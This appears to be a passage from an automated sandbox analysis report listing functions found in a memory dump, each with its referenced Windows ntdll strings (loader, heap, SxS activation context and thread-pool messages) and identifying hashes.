Opcode Fuzzy Hash: 0c422fcbf54a692a5d87b4919c370ada97e4b98d5f1f4f27dbcbf43734a4c29f
Instruction Fuzzy Hash: AD916B71648345AFD711DE21CD90FABBBECBF94784F80092EFA8496951E734D904CBA2

Function 22AA273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

SXS: %s() passed the empty activation context, xrefs: 22AE21DE
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 22AE21D9, 22AE22B1
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 22AE22B6
.Local, xrefs: 22AA28D8

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: 956780f108f8ef37d93ef2b1cd6421744cda8384fb86cc880a4c2c79cb23226d
Instruction ID: 9d1e8d6f520e277a516be466bf8ed3d194034d8f02f11a4dca14c37b98b92c72
Opcode Fuzzy Hash: 956780f108f8ef37d93ef2b1cd6421744cda8384fb86cc880a4c2c79cb23226d
Instruction Fuzzy Hash: FEA1BE31A40329DBDB20CF64CDD4B99B3B1BF58718F2141EAD908ABA51D7B09E91CF90

Function 22AA4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON

Download Yara Rule

Strings

RtlDeactivateActivationContext, xrefs: 22AE3425, 22AE3432, 22AE3451
SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 22AE3456
SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 22AE3437
SXS: %s() called with invalid flags 0x%08lx, xrefs: 22AE342A

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
API String ID: 0-1245972979
Opcode ID: 900055472be615044c89cb88a19c719b44076b931152d3256dfb67a568e76a01
Instruction ID: 4d8bba08c3c42ee2e081f73e5b05e934d7759e67196dab1d7b329b8934a79008
Opcode Fuzzy Hash: 900055472be615044c89cb88a19c719b44076b931152d3256dfb67a568e76a01
Instruction Fuzzy Hash: 736112326417119BC312CF18CA91F2AB3F5BF80B55F108569FD5A9FA40C734E901CB91

Function 22A764AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 22AD10AE
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 22AD1028
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 22AD0FE5
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 22AD106B

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: 6de379deee99be1881e54060f6a8672e7b3f33d43e94728a684e785d43ee1b08
Instruction ID: 27abf39ec0536e59fc0adaac18e27d025f6ed4fd066436cf485c7cf7825aece4
Opcode Fuzzy Hash: 6de379deee99be1881e54060f6a8672e7b3f33d43e94728a684e785d43ee1b08
Instruction Fuzzy Hash: C871C1B1A443049FC710CF18CAC4F8B7BA8BF55B54F400569FA488BA86D735D588DBD6

Function 22A9245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 22ADA992
apphelp.dll, xrefs: 22A92462
minkernel\ntdll\ldrinit.c, xrefs: 22ADA9A2
LdrpDynamicShimModule, xrefs: 22ADA998

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 59ba28091c8b80bc14c3eb5a6cd5df43133e5ac4f766bd67e33d75fcf5edf23b
Instruction ID: 846a1838693d0ede79dd1b6fe53245d3cb9d576689bfd595755247ae6f419c4a
Opcode Fuzzy Hash: 59ba28091c8b80bc14c3eb5a6cd5df43133e5ac4f766bd67e33d75fcf5edf23b
Instruction Fuzzy Hash: DD312873A80301ABD7108F69CAC0F7A77B4FF84B44F15451AED156BA96C7BCA981CB80

Function 22A829A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 22A83264
Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 22A8327D
HEAP[%wZ]: , xrefs: 22A83255

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: e842d83b82eacc0a39a1f94c4167174fcd4bc8e1fdb095c6449907daf55e346c
Instruction ID: ba55ba3f108fbe0d561ed5b16ad24b17cf906272175ac081f3fcdd60100c9d40
Opcode Fuzzy Hash: e842d83b82eacc0a39a1f94c4167174fcd4bc8e1fdb095c6449907daf55e346c
Instruction Fuzzy Hash: 3792CD71A043889FDB15CF68C580BAEBBF1FF08304F1481AAE989ABB51D774A945CF51

Function 22A80770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

(UCRBlock->Size >= *Size), xrefs: 22AD50CA
HEAP: , xrefs: 22AD50BD
HEAP[%wZ]: , xrefs: 22AD50AE

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 57693235d340374a5c53f371e358431b752cd7496922a0211a5c1a5d7415e955
Instruction ID: ad4e30aafe495e513118a38a59e6eb6ea14da95dea3da36c1b82f27b4d372b3f
Opcode Fuzzy Hash: 57693235d340374a5c53f371e358431b752cd7496922a0211a5c1a5d7415e955
Instruction Fuzzy Hash: 36F1A831A00705EFEB15CF68C991F6AB7B5FF54304F1082A8E5159BB91D734EA81CB92

Function 22A96962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

, xrefs: 22ADCA51
@, xrefs: 22A96C24

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID: $@
API String ID: 0-1077428164
Opcode ID: 45aee2225e961bbeab84c3de89f41919bb5b47d49c4069dcd928dd62a2206c9e
Instruction ID: 15ea015c3ac172546e6315167fc7d2550f3a460250d5afce9b178cfff9b8604a
Opcode Fuzzy Hash: 45aee2225e961bbeab84c3de89f41919bb5b47d49c4069dcd928dd62a2206c9e
Instruction Fuzzy Hash: 3EC27FB26083819FD725CF29C980BABBBE5BF88744F04892DF989C7641D734D945CB62

Function 22A6A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

UseFilter, xrefs: 22A6A1C1
FilterFullPath, xrefs: 22ACC2E6
\??\, xrefs: 22ACC1E4

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: 9ee59984538e83ed9bf4152a26c6b4ed879bf20ac1c7f6f77783ed12b9cb5665
Instruction ID: 5bbf8f26dd94d533d26bffff469e8f1fc94d9ee0c3c34aeb1a2a4cc19eace330
Opcode Fuzzy Hash: 9ee59984538e83ed9bf4152a26c6b4ed879bf20ac1c7f6f77783ed12b9cb5665
Instruction Fuzzy Hash: 54A1A9719513299BDB21DF24CD88BEAB7B9FF04704F1041EAEA09A7660E7359E84CF50

Function 22A90BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON

Download Yara Rule

Strings

Failed to allocated memory for shimmed module list, xrefs: 22ADA10F
minkernel\ntdll\ldrinit.c, xrefs: 22ADA121
LdrpCheckModule, xrefs: 22ADA117

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 0-161242083
Opcode ID: a3210d1312e06315502d1f46f8f1dc2e5920a41a64b97a646baad917c12ec211
Instruction ID: c1c50f7987496b106d7f2dda9461dda3c855dc8cfedd89327c4c36941ef249f0
Opcode Fuzzy Hash: a3210d1312e06315502d1f46f8f1dc2e5920a41a64b97a646baad917c12ec211
Instruction Fuzzy Hash: D071DE71A403059FDB04CF69CA81BAEB7F4FF48744F144429E906EBA96E738AA45CB40

Function 22A80A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 22AD5342
((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 22AD534D
HEAP[%wZ]: , xrefs: 22AD5335

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: e58556208bbfb06f8abe3bb68083cf0e6ed022038a40d68df246174a69df80b0
Instruction ID: d2e572c5c64a9dd0ed189feca72bc816ffe3648f6c2b31f109106ca416ed375c
Opcode Fuzzy Hash: e58556208bbfb06f8abe3bb68083cf0e6ed022038a40d68df246174a69df80b0
Instruction Fuzzy Hash: 2F610031600301DFD719CF24C595B6ABBF1FF44308F1486AAE9998FA96D770E881CB92

Function 22AAC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 22AE82E8
LdrpInitializePerUserWindowsDirectory, xrefs: 22AE82DE
Failed to reallocate the system dirs string !, xrefs: 22AE82D7

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: 9a020bdb72957dc1d1a9e91eefaacfdf80a628d6083f9f73c8d9da478ec631c1
Instruction ID: c2590ce6fc69768e41764240d88214cf64103d554ef31cd4ab7ad1f9d8eecbba
Opcode Fuzzy Hash: 9a020bdb72957dc1d1a9e91eefaacfdf80a628d6083f9f73c8d9da478ec631c1
Instruction Fuzzy Hash: C841C3B1684300EBD710DB74CE80B6B77E9BF58790F00492AF949D7AA5EB78D900CB91

Function 22B2C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 22B2C1C5
PreferredUILanguages, xrefs: 22B2C212
@, xrefs: 22B2C1F1

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: b58bf33b2b57251943109ce1dee220d503730c39410fb8bb1c160bbec7a95894
Instruction ID: 389fae42250b55315a66913461a080c757f3c22589a5d67ccbc3a643f9d03653
Opcode Fuzzy Hash: b58bf33b2b57251943109ce1dee220d503730c39410fb8bb1c160bbec7a95894
Instruction Fuzzy Hash: D8417E72E40709ABDB01CED4CD80FEEB7B8EB14B05F11426AEA49A7250DB749A44CB50

Function 22B04144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

@, xrefs: 22B04225
LdrpResValidateFilePath Enter, xrefs: 22B04160
LdrpResValidateFilePath Exit, xrefs: 22B04172

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: f560d8b3512f504b44643e7bae484d87ab77f6234b47a8e1863dbe616ace696a
Instruction ID: ee1030bdd24f1f4a0e131007e184ae1975eec356fa1db69dcd75a9932479ce0e
Opcode Fuzzy Hash: f560d8b3512f504b44643e7bae484d87ab77f6234b47a8e1863dbe616ace696a
Instruction Fuzzy Hash: 38410471A403888BEB12CBA5CA40B9DBFB8EF59344F10055AE940FFBA1DB349E41CB11

Function 22AF4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpCheckRedirection, xrefs: 22AF488F
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 22AF4888
minkernel\ntdll\ldrredirect.c, xrefs: 22AF4899

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: 3f324432289df61f918ef9b5854bcd133d23dc71cdf1415688453c0ab556b69e
Instruction ID: 82a0e9e13e2c5846d5c8eccdf100ad7f17b1d624065025f59aaf9900030ad065
Opcode Fuzzy Hash: 3f324432289df61f918ef9b5854bcd133d23dc71cdf1415688453c0ab556b69e
Instruction Fuzzy Hash: FA419032A04790DBCB21CE68CA80E667BF5BF49754F010659FE4897B65D73AE900CBD1

Function 22A80BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 22AD5449
HEAP: , xrefs: 22AD543E
HEAP[%wZ]: , xrefs: 22AD5431

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: ea5a5e768822426413576ac385ee31c74357da018105de164553ce671d68e94a
Instruction ID: 8dd666331700e2d501be58600c5bedd102190cef11b73708e3ae6387e7ac0d32
Opcode Fuzzy Hash: ea5a5e768822426413576ac385ee31c74357da018105de164553ce671d68e94a
Instruction Fuzzy Hash: A11130733553008FD708CA24C485F6AB3A2FF4072AF14862AE905EBE95EB30E840C782

Function 22AF20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 22AF2104
LdrpInitializationFailure, xrefs: 22AF20FA
Process initialization failed with status 0x%08lx, xrefs: 22AF20F3

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: 5f07788964ff853446204e7d41ac2c0da54e5742b3475773645197602a0ba799
Instruction ID: 3dbdfc584929e47488d337750e009200a2bbb6683d4b6ea4ea6c35b583649351
Opcode Fuzzy Hash: 5f07788964ff853446204e7d41ac2c0da54e5742b3475773645197602a0ba799
Instruction Fuzzy Hash: CEF0C871B80308BBE714D648CE92FA6376CFB50B94F100465FB007BA85D6F9A514C695

Function 22A803E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 22AD4D8A

Strings

#%u, xrefs: 22AD4D82

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: 811865322bea71eaa7a305538e5e82e756412c353462aea8d30953b7e9c8a0bf
Instruction ID: 75e6a69b81879ec8fa2a6a8b4f7d158a8b480c0dbc6e86d42081bcbf53334617
Opcode Fuzzy Hash: 811865322bea71eaa7a305538e5e82e756412c353462aea8d30953b7e9c8a0bf
Instruction Fuzzy Hash: D7714A72A403099FCB05CFA8CA91FAEB7B8BF18304F144165E905AB651EB34AA01CB61

Function 22A7A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Enter, xrefs: 22A7AA13
LdrResSearchResource Exit, xrefs: 22A7AA25

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: 7a56c26c1eb88003fa9db4841d7c91e7c7a5486bb8d2791b9c922c3516d9cfbb
Instruction ID: f541284c320dbcab4d7fbdc8fe540124b39b9c73db6eab4cb0d47c5360fdce0a
Opcode Fuzzy Hash: 7a56c26c1eb88003fa9db4841d7c91e7c7a5486bb8d2791b9c922c3516d9cfbb
Instruction Fuzzy Hash: 9FE18072E04309AFEB11CF95CE80B9EB7B9BF58354F104526FA02EBA42D7788940CB54

Function 22B3A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 22B3A551
`, xrefs: 22B3A44B

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: 7dfb44702edf562eb87262a60f8ca7673be5caf3ea0593fd5a19e7c226b7e195
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: DBC1F2322043429BDB16CF24C941B6BBBE5FFD5318F244A2DFA95CA2A1D778D505CB82

Function 22AEE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

UEFI, xrefs: 22AEE751
Legacy, xrefs: 22AEE75A

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: c7442db48d2f8a0a7355a16272a8867bd1ed2bf80f0ed6a1495ea97196ece4f7
Instruction ID: 02733c0f4004514c6326ac671fbad2eec049793fe106e033f3f1ec5a8c1ef3e6
Opcode Fuzzy Hash: c7442db48d2f8a0a7355a16272a8867bd1ed2bf80f0ed6a1495ea97196ece4f7
Instruction Fuzzy Hash: F3614871E403099FDB15CFA8CA80BAEBBB9BB48714F104079E65AEB651D731A901CB50

Function 22B143D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

MUI, xrefs: 22B14525
@, xrefs: 22B14437

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID: @$MUI
API String ID: 0-17815947
Opcode ID: b984e6fc2043e14424cd4b211ed558c0735eec3ca7e83b438277868fb6281878
Instruction ID: ab61a1532eac849702d65cb7729f42e951d508a2e8cb3134fcb947db5351c8c9
Opcode Fuzzy Hash: b984e6fc2043e14424cd4b211ed558c0735eec3ca7e83b438277868fb6281878
Instruction Fuzzy Hash: AB5106B1E4031DAEDF11CFA5CD80BEEBBBCEF58754F10052AE611A7291DA709A05CB60

Function 22A704E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 22A7063D
kLsE, xrefs: 22A70540

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: ad58c1df627508e386c4647204e828c84ed08111cdb9683216a9efdc125cf96d
Instruction ID: e86e5e71cc019a9bf98464df87ddc79326cbdfc42c8eb8522a865601604386e9
Opcode Fuzzy Hash: ad58c1df627508e386c4647204e828c84ed08111cdb9683216a9efdc125cf96d
Instruction Fuzzy Hash: 05518C716047429FC314DF74C6916ABB7F4BF84304F00883EEAA987A81E774E645CB9A

Function 22AA2E9C Relevance: 2.6, Strings: 2, Instructions: 130COMMON

Download Yara Rule

Strings

RtlpInsertAssemblyStorageMapEntry, xrefs: 22AE2807
SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand, xrefs: 22AE280C

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID: RtlpInsertAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand
API String ID: 0-2104531740
Opcode ID: 022f12d8fe890c969ef6146ce01bcce3d37aad5841669c72fdc6ac6642c4e712
Instruction ID: a124e77c2a47044e4ce1ad89933f08067dd9136872e796e307394863562a0358
Opcode Fuzzy Hash: 022f12d8fe890c969ef6146ce01bcce3d37aad5841669c72fdc6ac6642c4e712
Instruction Fuzzy Hash: 7741E236600311EBD714CF55C981E6AB3B5FFA4B14F20816EE9499BA40D7B0DD52CBA0

Function 22A7A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Enter, xrefs: 22A7A2FB
RtlpResUltimateFallbackInfo Exit, xrefs: 22A7A309

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: a7a0fea6c8bb52272cacb3a91d20290de1367615a05a128fa3ffb703e27b5db7
Instruction ID: fcfbb0811e7d6284c01e26999185cfa37801fe393a0ba17980eb39d365778740
Opcode Fuzzy Hash: a7a0fea6c8bb52272cacb3a91d20290de1367615a05a128fa3ffb703e27b5db7
Instruction Fuzzy Hash: 7A41E139A04749EBDB01CF69CA80B5E77B4FF84704F1081E5EA15DBA92E7B9DA00CB45

Function 22AAA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Threadpool!, xrefs: 22AAA5E9
Cleanup Group, xrefs: 22AAA5E4

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: 61b14415b43e787ffe457cc33bef5536af7ad17c19fc5f622d91524f326bcfd3
Instruction ID: ba0c9c2ad7cbff4a6a1af0c7288bb4e46a688b8acdf9d00038c606afcd4af44d
Opcode Fuzzy Hash: 61b14415b43e787ffe457cc33bef5536af7ad17c19fc5f622d91524f326bcfd3
Instruction Fuzzy Hash: 3301DCB2640740AFE311CF28CE45F26B7F8EB64719F00893AA658C7A91E738D804CB46

Function 22A7C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 22A7C8C3, 22A7CA40

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: 3356ba3437bf7bec12d2bfabec1c5a6e1bfeb7b67bffdf5c0df707c1b5500c94
Instruction ID: 4bb894d76d607be235061b2496075ad0412536a6d9f5a709a3a8a3d4b89d7590
Opcode Fuzzy Hash: 3356ba3437bf7bec12d2bfabec1c5a6e1bfeb7b67bffdf5c0df707c1b5500c94
Instruction Fuzzy Hash: 7C827E75E007189FEB14CFA9CA80BADB7B2BF48354F108169E919ABB91D7309D41CF58

Function 22AF6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 22AF65C1

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 94769da5e5c209fccdf361bf2cd62ccdee30a2b195b62f768074301af9dc9c8b
Instruction ID: 502ff1b1780dc95c4de0c238f0e5b32125abb7e6e323f064914608c244b83af3
Opcode Fuzzy Hash: 94769da5e5c209fccdf361bf2cd62ccdee30a2b195b62f768074301af9dc9c8b
Instruction Fuzzy Hash: E6916DB2A41319AFDB11CB99CE85FAE7BB9EF18B50F100065F710BB590D775A904CBA0

Function 22B1E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

, xrefs: 22B1E1FA

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID:
